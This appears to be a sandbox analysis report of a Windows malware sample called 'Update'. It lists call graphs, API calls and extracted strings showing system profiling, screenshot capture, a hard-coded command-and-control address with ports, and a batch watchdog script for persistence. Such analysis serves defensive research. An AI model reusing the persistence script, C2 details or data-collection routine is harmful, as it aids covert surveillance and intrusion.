133479->133480 133481 6c31a18d __fread_nolock 29 API calls 133479->133481 133480->133458 133482 6c32b3f8 133481->133482 133482->133480 133483 6c31a18d __fread_nolock 29 API calls 133482->133483 133484 6c32b406 133483->133484 133485 6c31a18d __fread_nolock 29 API calls 133484->133485 133485->133480 133486->133452 133487->133455 133488->133458 133490 6c32b8e4 133489->133490 133491 6c32b8fc 133489->133491 133608 6c30ea1c 14 API calls _memcpy_s 133490->133608 133492 6c32bc3e 133491->133492 133498 6c32b93f 133491->133498 133627 6c30ea1c 14 API calls _memcpy_s 133492->133627 133495 6c32b8e9 133609 6c30ea09 14 API calls _memcpy_s 133495->133609 133497 6c32bc43 133628 6c30ea09 14 API calls _memcpy_s 133497->133628 133499 6c32b8f1 133498->133499 133501 6c32b94a 133498->133501 133507 6c32b97a 133498->133507 133499->133458 133610 6c30ea1c 14 API calls _memcpy_s 133501->133610 133502 6c32b957 133629 6c31ae7c 29 API calls _memcpy_s 133502->133629 133504 6c32b94f 133611 6c30ea09 14 API calls _memcpy_s 133504->133611 133508 6c32b993 133507->133508 133509 6c32b9a0 133507->133509 133510 6c32b9ce 133507->133510 133508->133509 133543 6c32b9bc 133508->133543 133612 6c30ea1c 14 API calls _memcpy_s 133509->133612 133615 6c3223f1 15 API calls 3 library calls 133510->133615 133512 6c32b9a5 133613 6c30ea09 14 API calls _memcpy_s 133512->133613 133516 6c32b9df 133616 6c3223b7 14 API calls 2 library calls 133516->133616 133517 6c32b9ac 133614 6c31ae7c 29 API calls _memcpy_s 133517->133614 133518 6c32bb1a 133522 6c32bb8e 133518->133522 133525 6c32bb33 GetConsoleMode 133518->133525 133520 6c32b9e8 133617 6c3223b7 14 API calls 2 library calls 133520->133617 133524 6c32bb92 ReadFile 133522->133524 133527 6c32bc06 GetLastError 133524->133527 133528 6c32bbaa 133524->133528 133525->133522 133529 6c32bb44 133525->133529 133526 6c32b9ef 133530 6c32ba14 133526->133530 133531 6c32b9f9 133526->133531 133532 6c32bc13 133527->133532 133540 6c32bb6a 133527->133540 133528->133527 133538 6c32bb83 133528->133538 133529->133524 133533 6c32bb4a ReadConsoleW 133529->133533 133620 6c328bae 31 API calls 2 library calls 133530->133620 133618 6c30ea09 14 API calls _memcpy_s 133531->133618 133625 6c30ea09 14 API calls _memcpy_s 133532->133625 133533->133538 133539 6c32bb64 GetLastError 133533->133539 133547 6c32bbe6 133538->133547 133548 6c32bbcf 133538->133548 133549 6c32b9b7 __fread_nolock 133538->133549 133539->133540 133540->133549 133621 6c30ea2f 14 API calls 2 library calls 133540->133621 133541 6c32b9fe 133619 6c30ea1c 14 API calls _memcpy_s 133541->133619 133542 6c32bc18 133626 6c30ea1c 14 API calls _memcpy_s 133542->133626 133599 6c32f4af 133543->133599 133547->133549 133550 6c32bbff 133547->133550 133623 6c32bcdb 34 API calls 3 library calls 133548->133623 133622 6c3223b7 14 API calls 2 library calls 133549->133622 133624 6c32bf7f 32 API calls __fread_nolock 133550->133624 133553 6c32bc04 133553->133549 133554->133452 133556 6c32b7c5 ___scrt_is_nonwritable_in_current_image 133555->133556 133557 6c32b7cd 133556->133557 133560 6c32b7e8 133556->133560 133589 6c30ea1c 14 API calls _memcpy_s 133557->133589 133559 6c32b7d2 133590 6c30ea09 14 API calls _memcpy_s 133559->133590 133561 6c32b7ff 133560->133561 133564 6c32b83a 133560->133564 133591 6c30ea1c 14 API calls _memcpy_s 133561->133591 133565 6c32b843 133564->133565 133566 6c32b858 133564->133566 133594 6c30ea1c 14 API calls _memcpy_s 133565->133594 133588 6c31a9c1 EnterCriticalSection 133566->133588 133567 6c32b804 133592 6c30ea09 14 API calls _memcpy_s 133567->133592 133571 6c32b848 133595 6c30ea09 14 API calls _memcpy_s 133571->133595 133572 6c32b85e 133575 6c32b892 133572->133575 133576 6c32b87d 133572->133576 133573 6c32b80c 133593 6c31ae7c 29 API calls _memcpy_s 133573->133593 133579 6c32b8d2 __fread_nolock 41 API calls 133575->133579 133596 6c30ea09 14 API calls _memcpy_s 133576->133596 133581 6c32b88d 133579->133581 133580 6c32b882 133597 6c30ea1c 14 API calls _memcpy_s 133580->133597 133598 6c32b8ca LeaveCriticalSection __wsopen_s 133581->133598 133584 6c32b3b9 133584->133478 133584->133480 133585->133469 133586->133480 133587->133472 133588->133572 133589->133559 133590->133584 133591->133567 133592->133573 133593->133584 133594->133571 133595->133573 133596->133580 133597->133581 133598->133584 133600 6c32f4c9 133599->133600 133601 6c32f4bc 133599->133601 133605 6c32f4d5 133600->133605 133631 6c30ea09 14 API calls _memcpy_s 133600->133631 133630 6c30ea09 14 API calls _memcpy_s 133601->133630 133604 6c32f4c1 133604->133518 133605->133518 133606 6c32f4f6 133632 6c31ae7c 29 API calls _memcpy_s 133606->133632 133608->133495 133609->133499 133610->133504 133611->133502 133612->133512 133613->133517 133614->133549 133615->133516 133616->133520 133617->133526 133618->133541 133619->133549 133620->133543 133621->133549 133622->133499 133623->133549 133624->133553 133625->133542 133626->133549 133627->133497 133628->133502 133629->133499 133630->133604 133631->133606 133632->133604 133633 10004274 133634 1001f814 CreateThread 133633->133634 133636 10006110 133634->133636 133636->133636 133637 6c1c3de8 WSAStartup 133638 6c1c3c69 133637->133638 133639 6c1bf5e2 SHGetFolderPathA 133640 6c1bf61a _strlen 133639->133640 133641 6c1bf698 133640->133641 133642 6c1bf621 133640->133642 133650 6c1b22c0 31 API calls 4 library calls 133641->133650 133644 6c1bf65c 133642->133644 133645 6c1bf664 133642->133645 133648 6c1bf628 _memcpy_s 133642->133648 133649 6c1b1ba0 31 API calls ___CxxFrameHandler 133644->133649 133647 6c1c95d7 ___CxxFrameHandler 16 API calls 133645->133647 133647->133648 133649->133648 133650->133641 133651 1001f63d send 133652 6c1e0223 133653 6c1e0227 133652->133653 133655 6c1e023d 133652->133655 133653->133655 133656 6c1eebed 7 API calls 3 library calls 133653->133656 133656->133655

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4325430-43254b7 call 432f707 call 4336770 * 3 gethostname gethostbyname 9 432555c-432569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 4327490 GetSystemInfo wsprintfW call 4326c50 call 4326ee0 GetForegroundWindow 0->9 10 43254bd-4325504 inet_ntoa call 43303cf * 2 0->10 24 43256b2-43256c0 9->24 25 432569f-43256ac GetWindowTextW 9->25 10->9 20 4325506-4325508 10->20 22 4325510-432555a inet_ntoa call 43303cf * 2 20->22 22->9 27 43256c2 24->27 28 43256cc-43256f0 lstrlenW call 4326d70 24->28 25->24 27->28 33 4325702-4325726 call 432f876 28->33 34 43256f2-43256ff call 432f876 28->34 39 4325732-4325756 lstrlenW call 4326d70 33->39 40 4325728 33->40 34->33 43 4325768-43257b9 GetModuleHandleW GetProcAddress 39->43 44 4325758-4325765 call 432f876 39->44 40->39 46 43257c6-43257cd GetSystemInfo 43->46 47 43257bb-43257c4 GetNativeSystemInfo 43->47 44->43 48 43257d3-43257e1 46->48 47->48 50 43257e3-43257eb 48->50 51 43257ed-43257f2 48->51 50->51 52 43257f4 50->52 53 43257f9-4325820 wsprintfW call 4326a70 GetCurrentProcessId 51->53 52->53 56 4325822-432583c OpenProcess 53->56 57 4325885-432588c call 4326690 53->57 56->57 59 432583e-4325853 K32GetProcessImageFileNameW 56->59 63 432589e-43258ab 57->63 64 432588e-432589c 57->64 61 4325855-432585c 59->61 62 432585e-4325866 call 43280f0 59->62 65 432587f CloseHandle 61->65 68 432586b-432586d 62->68 67 43258ac-43259a1 call 432f876 call 4326490 call 4326150 call 432fc0e GetTickCount call 433043c call 43303a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 63->67 64->67 65->57 83 43259a3-43259c8 67->83 84 43259ca-43259e9 67->84 70 4325878-432587e 68->70 71 432586f-4325876 68->71 70->65 71->65 85 43259ea-4325a0f call 4325a30 call 4323160 83->85 84->85 88 4325a11-4325a2e call 432efff call 432f00a 85->88
                                              APIs
                                                • Part of subcall function 0432F707: _malloc.LIBCMT ref: 0432F721
                                              • _memset.LIBCMT ref: 0432546C
                                              • _memset.LIBCMT ref: 04325485
                                              • _memset.LIBCMT ref: 04325495
                                              • gethostname.WS2_32(?,00000032), ref: 043254A3
                                              • gethostbyname.WS2_32(?), ref: 043254AD
                                              • inet_ntoa.WS2_32 ref: 043254C5
                                              • _strcat_s.LIBCMT ref: 043254D8
                                              • _strcat_s.LIBCMT ref: 043254F1
                                              • inet_ntoa.WS2_32 ref: 0432551A
                                              • _strcat_s.LIBCMT ref: 0432552D
                                              • _strcat_s.LIBCMT ref: 04325546
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04325573
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04325587
                                              • GetLastInputInfo.USER32(?), ref: 0432559A
                                              • GetTickCount.KERNEL32 ref: 043255A0
                                              • wsprintfW.USER32 ref: 043255D5
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 043255E8
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 043255FC
                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04325653
                                              • wsprintfW.USER32 ref: 0432566C
                                              • GetForegroundWindow.USER32 ref: 04325695
                                              • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 043256AC
                                              • lstrlenW.KERNEL32(000008CC), ref: 043256D3
                                              • lstrlenW.KERNEL32(00000994), ref: 04325739
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 043257AA
                                              • GetProcAddress.KERNEL32(00000000), ref: 043257B1
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 043257C2
                                              • GetSystemInfo.KERNEL32(?), ref: 043257CD
                                              • wsprintfW.USER32 ref: 04325806
                                              • GetCurrentProcessId.KERNEL32 ref: 04325818
                                              • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0432582E
                                              • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0432584B
                                              • CloseHandle.KERNEL32(04345164), ref: 0432587F
                                              • GetTickCount.KERNEL32 ref: 043258E9
                                              • __time64.LIBCMT ref: 043258F8
                                              • __localtime64.LIBCMT ref: 0432592F
                                              • wsprintfW.USER32 ref: 04325968
                                              • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0432597D
                                              • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0432598C
                                              • GetCurrentHwProfileW.ADVAPI32(?), ref: 04325999
                                                • Part of subcall function 043280F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04328132
                                                • Part of subcall function 043280F0: lstrcmpiW.KERNEL32(?,A:\), ref: 04328166
                                                • Part of subcall function 043280F0: lstrcmpiW.KERNEL32(?,B:\), ref: 04328176
                                                • Part of subcall function 043280F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 043281A6
                                                • Part of subcall function 043280F0: lstrlenW.KERNEL32(?), ref: 043281B7
                                                • Part of subcall function 043280F0: __wcsnicmp.LIBCMT ref: 043281CE
                                                • Part of subcall function 043280F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 04328204
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                              • String ID: %d min$1.0$2024.11.10$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                              • API String ID: 1101047656-762248391
                                              • Opcode ID: 31d87e32d01440788b15215899d6dfe8843b28e6476c93d62f9560bb1980dad1
                                              • Instruction ID: 733aa0ca6edbed6324cd863eb3d8dde2cd145548f285bb9e59a029fbdfddf6f6
                                              • Opcode Fuzzy Hash: 31d87e32d01440788b15215899d6dfe8843b28e6476c93d62f9560bb1980dad1
                                              • Instruction Fuzzy Hash: E0F1B1B5A40214BBE724DB64CD85FEB73B8EF88704F005598F71AA7280EA70BA44CF55
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.bat$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $P}2$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($itor$set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                              • API String ID: 4218353326-1072435208
                                              • Opcode ID: 2d26c3f1a91fe7d39af7e8b00ca01e3fa28db90eaf337819fe294eda547ad807
                                              • Instruction ID: 7daf6862bee14b70148eda4cada71c55e10ba2a640b4db090d5454e353195f0e
                                              • Opcode Fuzzy Hash: 2d26c3f1a91fe7d39af7e8b00ca01e3fa28db90eaf337819fe294eda547ad807
                                              • Instruction Fuzzy Hash: 31B2D0B1900B018BE324CF34D894B97B7E5BF59308F144A2DD5AA97B81EB34F5498FA1
                                              APIs
                                              • GetNativeSystemInfo.KERNEL32(?), ref: 032804AE
                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 032804DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3549853052.0000000003280000.00000040.00001000.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_3280000_Update.jbxd
                                              Similarity
                                              • API ID: AllocInfoNativeSystemVirtual
                                              • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                              • API String ID: 2032221330-2899676511
                                              • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                              • Instruction ID: 9dd9c1bcf65517956332899f6b13cbc195ee47f88d239c645b6e53d359944806
                                              • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                              • Instruction Fuzzy Hash: 4C629E7251A3859FD330DF14C840BABB7E4FF84704F08882DE9C99B291E774A989CB56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $P}2$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                              • API String ID: 0-297688578
                                              • Opcode ID: 0f5f532cd6b788d51b8a72a1f122d0be1973c38475a56a94ce433d3a2bd3ec9d
                                              • Instruction ID: f8f70fa74f114e2c04f2b4b6cec23c407c30e1b6c2586baac5a383bf79ffc5b9
                                              • Opcode Fuzzy Hash: 0f5f532cd6b788d51b8a72a1f122d0be1973c38475a56a94ce433d3a2bd3ec9d
                                              • Instruction Fuzzy Hash: F2F2A0B1900B019BE324CF34C894BA7B7E5BF59308F144A2ED59A97B41EB34F5498FA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $P}2$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                              • API String ID: 0-297688578
                                              • Opcode ID: 813b0591e56a67d53193c993b9291cdd9e8bf9c35a0a47cdeb8b1e38043d903a
                                              • Instruction ID: 973d9c7ee9f0619a8d469d2238e2ba4903069fd2a120c6793156d70e497c1dcb
                                              • Opcode Fuzzy Hash: 813b0591e56a67d53193c993b9291cdd9e8bf9c35a0a47cdeb8b1e38043d903a
                                              • Instruction Fuzzy Hash: AAC2C0B1900B018BE325CF34C894B96B7F5BF59308F144A2DD5AA97B81EB34F5488FA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2225 432df10-432df72 call 4330542 Sleep 2228 432df97-432df9d 2225->2228 2229 432df74-432df91 call 432f707 call 432fa29 CloseHandle 2225->2229 2231 432dfa4-432e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 432fa29 CloseHandle call 432f707 2228->2231 2232 432df9f call 4327620 2228->2232 2229->2228 2241 432e01b-432e026 call 4322c90 2231->2241 2242 432e028 2231->2242 2232->2231 2244 432e02c-432e046 call 432f707 2241->2244 2242->2244 2248 432e054 2244->2248 2249 432e048-432e049 call 4329730 2244->2249 2251 432e058 2248->2251 2252 432e04e-432e052 2249->2252 2253 432e063-432e06f call 432ce00 2251->2253 2252->2251 2256 432e071-432e0b7 call 432f876 * 2 2253->2256 2257 432e0b9-432e0fa call 432f876 * 2 2253->2257 2266 432e100-432e110 2256->2266 2257->2266 2267 432e152-432e15a 2266->2267 2268 432e112-432e14c call 432ce00 call 432f876 * 2 2266->2268 2269 432e162-432e169 2267->2269 2270 432e15c-432e15e 2267->2270 2268->2267 2272 432e177-432e17b 2269->2272 2273 432e16b-432e175 2269->2273 2270->2269 2276 432e181-432e187 2272->2276 2273->2276 2278 432e1c6-432e1ee call 4330542 call 4322da0 2276->2278 2279 432e189-432e1a3 EnumWindows 2276->2279 2286 432e200-432e2ac call 4330542 CreateEventA call 432f876 call 432ca70 2278->2286 2287 432e1f0-432e1fb Sleep 2278->2287 2279->2278 2281 432e1a5-432e1c4 Sleep EnumWindows 2279->2281 2281->2278 2281->2281 2295 432e2b7-432e2bd 2286->2295 2287->2253 2296 432e318-432e32c call 4325430 2295->2296 2297 432e2bf-432e2f3 Sleep RegOpenKeyExW 2295->2297 2301 432e331-432e337 2296->2301 2299 432e311-432e316 2297->2299 2300 432e2f5-432e30b RegQueryValueExW 2297->2300 2299->2295 2299->2296 2300->2299 2302 432e36a-432e370 2301->2302 2303 432e339-432e365 CloseHandle 2301->2303 2304 432e372-432e38e call 432fa29 2302->2304 2305 432e390 2302->2305 2303->2253 2308 432e394 2304->2308 2305->2308 2310 432e396-432e39d 2308->2310 2311 432e39f-432e3ae Sleep 2310->2311 2312 432e40d-432e420 2310->2312 2311->2310 2313 432e3b0-432e3b7 2311->2313 2316 432e432-432e46c call 4330542 Sleep CloseHandle 2312->2316 2317 432e422-432e42c WaitForSingleObject CloseHandle 2312->2317 2313->2312 2315 432e3b9-432e3cb 2313->2315 2320 432e3dd-432e408 Sleep CloseHandle 2315->2320 2321 432e3cd-432e3d7 WaitForSingleObject CloseHandle 2315->2321 2316->2253 2317->2316 2320->2253 2321->2320
                                              APIs
                                                • Part of subcall function 04330542: __fassign.LIBCMT ref: 04330538
                                              • Sleep.KERNEL32(00000000), ref: 0432DF64
                                              • CloseHandle.KERNEL32(00000000), ref: 0432DF91
                                              • GetLocalTime.KERNEL32(?), ref: 0432DFA9
                                              • wsprintfW.USER32 ref: 0432DFE0
                                              • SetUnhandledExceptionFilter.KERNEL32(043275B0), ref: 0432DFEE
                                              • CloseHandle.KERNEL32(00000000), ref: 0432E007
                                                • Part of subcall function 0432F707: _malloc.LIBCMT ref: 0432F721
                                              • EnumWindows.USER32(04325CC0,?), ref: 0432E19D
                                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0432E1AA
                                              • EnumWindows.USER32(04325CC0,?), ref: 0432E1BE
                                              • Sleep.KERNEL32(00000BB8), ref: 0432E1F5
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0432E241
                                              • Sleep.KERNEL32(00000FA0), ref: 0432E2C4
                                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0432E2EB
                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0432E30B
                                              • CloseHandle.KERNEL32(?), ref: 0432E35D
                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0432E3A4
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0432E3D0
                                              • CloseHandle.KERNEL32(?,?,?), ref: 0432E3D7
                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0432E3E2
                                              • CloseHandle.KERNEL32(?), ref: 0432E400
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0432E425
                                              • CloseHandle.KERNEL32(?,?,?), ref: 0432E42C
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 0432E446
                                              • CloseHandle.KERNEL32(?), ref: 0432E464
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$154.82.85.79$154.82.85.79$154.82.85.79$18091$18091$18092$Console$IpDatespecial
                                              • API String ID: 1511462596-2091554053
                                              • Opcode ID: 7767d5162235558d0e3ba002a212be26efa888af9d0219f2d0b4977fcfb7db1f
                                              • Instruction ID: da4e115d670166f3a450bc6f0a95c4a86723f11002e78fc70ebe1b54fa4f1809
                                              • Opcode Fuzzy Hash: 7767d5162235558d0e3ba002a212be26efa888af9d0219f2d0b4977fcfb7db1f
                                              • Instruction Fuzzy Hash: C5D1AEB4944350ABE320DF64D986ABB77BCFBC8B14F006A1DF55592280EB75B901CB62

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2324 432bc70-432bce3 GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 2325 432bcf6-432bcfe GetSystemMetrics 2324->2325 2326 432bce5-432bcf1 2324->2326 2327 432bd00-432bd49 call 43401c0 GetSystemMetrics call 43401c0 2325->2327 2328 432bd4b-432bd69 call 43401c0 GetSystemMetrics call 43401c0 2325->2328 2329 432bd76-432beff GetSystemMetrics call 43401c0 GetSystemMetrics call 43401c0 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics call 43401c0 GetSystemMetrics call 43401c0 StretchBlt call 432eff4 call 4336770 GetDIBits call 432eff4 call 4336770 call 4337660 call 432f707 2326->2329 2340 432bd6e-432bd73 2327->2340 2328->2340 2358 432bf10-432bf1d call 432c060 2329->2358 2359 432bf01-432bf0e 2329->2359 2340->2329 2362 432bf99-432bfc3 call 432eff4 2358->2362 2363 432bf1f-432bf4a DeleteObject * 2 ReleaseDC call 432fac9 2358->2363 2359->2358 2368 432bfc5-432bfc7 2362->2368 2369 432bfc9 2362->2369 2370 432bf55-432bf57 2363->2370 2371 432bf4c-432bf52 call 432fac9 2363->2371 2373 432bfcb-432c006 call 4337660 DeleteObject * 2 ReleaseDC call 432fac9 2368->2373 2369->2373 2374 432bf84-432bf96 call 432f00a 2370->2374 2375 432bf59-432bf5d 2370->2375 2371->2370 2389 432c011-432c015 2373->2389 2390 432c008-432c009 call 432fac9 2373->2390 2378 432bf6a-432bf81 call 432efff 2375->2378 2379 432bf5f-432bf67 call 432efff 2375->2379 2378->2374 2379->2378 2391 432c022-432c04f call 432efff call 432f00a 2389->2391 2392 432c017-432c01f call 432efff 2389->2392 2394 432c00e 2390->2394 2392->2391 2394->2389
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 0432BC8F
                                              • GetDC.USER32(00000000), ref: 0432BC9C
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0432BCA2
                                              • GetDC.USER32(00000000), ref: 0432BCAD
                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0432BCBA
                                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 0432BCC2
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0432BCD3
                                              • GetSystemMetrics.USER32(0000004E), ref: 0432BCF8
                                              • GetSystemMetrics.USER32(0000004F), ref: 0432BD26
                                              • GetSystemMetrics.USER32(0000004C), ref: 0432BD78
                                              • GetSystemMetrics.USER32(0000004D), ref: 0432BD8D
                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0432BDA6
